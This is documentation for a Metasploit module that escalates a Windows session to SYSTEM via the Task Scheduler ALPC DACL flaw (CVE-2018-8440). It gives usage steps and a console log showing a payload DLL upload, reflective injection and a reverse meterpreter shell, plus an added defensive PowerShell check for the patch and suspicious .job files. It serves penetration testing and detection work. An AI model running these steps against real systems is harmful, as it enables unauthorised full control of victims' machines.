metasploit-gs/documentation/modules/exploit/windows/local/alpc_taskscheduler.md
2018-09-19 10:22:51 -05:00
## Description

On vulnerable versions of Windows, the ALPC endpoint method `SchRpcSetSecurity`, implemented by the Task Scheduler service, can be used to write arbitrary DACLs to `.job` files located in `c:\windows\tasks`, because the scheduler does not impersonate the caller when it checks this location. Since any user can create files in the `c:\windows\tasks` folder, a hard link can be created there to a file the user has read access to. Once the hard link exists, the vulnerability can be triggered to set the DACL on the linked file. This module has been tested against Windows 10 Pro x64.

## Vulnerable Application

Windows OSes without the [KB4457142 patch](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440)

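As an added defender-side check, not part of the module or its documentation: a PowerShell script that reports whether the update named above is installed and whether any `.job` file in `C:\Windows\Tasks` shows the hard-link or DACL condition described in the module description. The function name, the list of trusted principals, and the assumption that the page's KB number applies to the host's Windows version (other versions received other cumulative updates) are mine.

```powershell
# Added example, not the module's own code. Reports conditions related to
# CVE-2018-8440 on the local host; it changes nothing.
function Test-TaskSchedulerDaclExposure {
    param(
        # KB number taken from the page; assumed to match this host's Windows version.
        [string]$FixKb = 'KB4457142',
        [string]$TasksDir = 'C:\Windows\Tasks'
    )
    $findings = @()

    # 1. Patch presence, read from the installed-updates list.
    if (-not (Get-HotFix -Id $FixKb -ErrorAction SilentlyContinue)) {
        $findings += "Update $FixKb not found; host may be unpatched for CVE-2018-8440."
    }

    # Principals that are expected to hold write rights on a .job file (assumption).
    $trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                 'NT SERVICE\TrustedInstaller')
    $fsr = [System.Security.AccessControl.FileSystemRights]
    # WriteData covers content changes; WriteDac covers changing the DACL itself.
    $writeMask = $fsr::WriteData -bor $fsr::WriteDac

    Get-ChildItem -Path $TasksDir -Filter '*.job' -File -ErrorAction SilentlyContinue |
      ForEach-Object {
        # 2. Hard-link count. 'fsutil hardlink list' prints one path per link;
        #    a legitimate .job file normally has exactly one.
        $links = @(& fsutil.exe hardlink list $_.FullName 2>$null)
        if ($links.Count -gt 1) {
            $findings += "$($_.FullName) has $($links.Count) hard links: $($links -join ', ')"
        }

        # 3. DACL review: write or WriteDac granted to a non-trusted principal.
        $acl = Get-Acl -Path $_.FullName
        foreach ($ace in $acl.Access) {
            $id = $ace.IdentityReference.Value
            if ($ace.AccessControlType -eq 'Allow' -and
                (($ace.FileSystemRights -band $writeMask) -ne 0) -and
                ($trusted -notcontains $id)) {
                $findings += "$($_.FullName): $id has $($ace.FileSystemRights)"
            }
        }
      }

    return $findings
}

# Usage: print each finding, or a clean result if there are none.
$result = Test-TaskSchedulerDaclExposure
if ($result.Count -eq 0) { 'No findings.' } else { $result }
```

Run it as an ordinary user on a host where the module is suspected to have been used; any `.job` file with more than one hard link, or with a non-trusted principal holding write rights, merits a closer look at the linked target.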
## Verification Steps

* Get a meterpreter session on Windows 10 x64
* `use exploit/windows/local/alpc_taskscheduler`
* `set session <session>`
* `set payload <payload>`
* `set lhost <lhost>`
* `run`
* Get a session as SYSTEM

## Scenarios

### Tested on Windows 10 Pro Version 1803 x64

```
msf5 exploit(windows/local/alpc_taskscheduler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-IPOGIJR\msfdev @ DESKTOP-IPOGIJR 172.22.222.243:4444 -> 172.22.222.200:50490 (172.22.222.200)
msf5 exploit(windows/local/alpc_taskscheduler) > run
[*] Started reverse TCP handler on 172.22.222.243:4444
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
[*] Payload (5120 bytes) uploaded on DESKTOP-IPOGIJR to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 3768 launched.
[*] Attempting to change the payload path to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll...
[*] Reflectively injecting the exploit DLL into 3768...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.243:4444 -> 172.22.222.200:50491) at 2018-09-17 17:37:07 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-IPOGIJR
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
```